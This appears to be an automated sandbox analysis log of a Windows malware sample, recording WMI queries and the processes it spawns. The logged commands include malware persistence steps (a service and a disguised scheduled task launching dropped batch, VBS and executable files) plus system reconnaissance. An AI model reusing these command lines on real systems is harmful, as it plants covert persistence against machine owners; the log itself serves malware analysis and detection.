      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1332&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1372&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1416&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1444&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1460&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1576&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1584&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1640&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1652&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1712&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1796&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1804&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1928&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1936&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1944&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2012&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1980&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2052&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2060&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2132&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2184&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2320&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2328&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2364&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2396&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2412&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2488&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2508&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2516&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2532&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2644&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2688&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2856&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;968&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3616&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3628&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3676&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3900&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4260&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4436&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4468&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4572&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4612&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6592&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6752&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6572&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2440&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5352&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6692&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5356&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5888&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;7516&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;7516&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;7552&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;7616&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;7724&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6668&quot;::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;BIXS3FROLE.EXE&apos;
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;BIXS3FROLE.EXE&apos;
      Source: C:\Windows\SysWOW64\find.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\find.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;BIXS3FROLE.EXE&apos;
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;BIXS3FROLE.EXE&apos;
      Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: tasklist.exe, 00000004.00000003.1278119642.00000000033C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processs;o
      Source: tasklist.exe, 00000004.00000003.1279876506.00000000033C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processs;
      Source: BiXS3FRoLe.exeReversingLabs: Detection: 84%
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile read: C:\Users\user\Desktop\BiXS3FRoLe.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\BiXS3FRoLe.exe "C:\Users\user\Desktop\BiXS3FRoLe.exe"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknownProcess created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
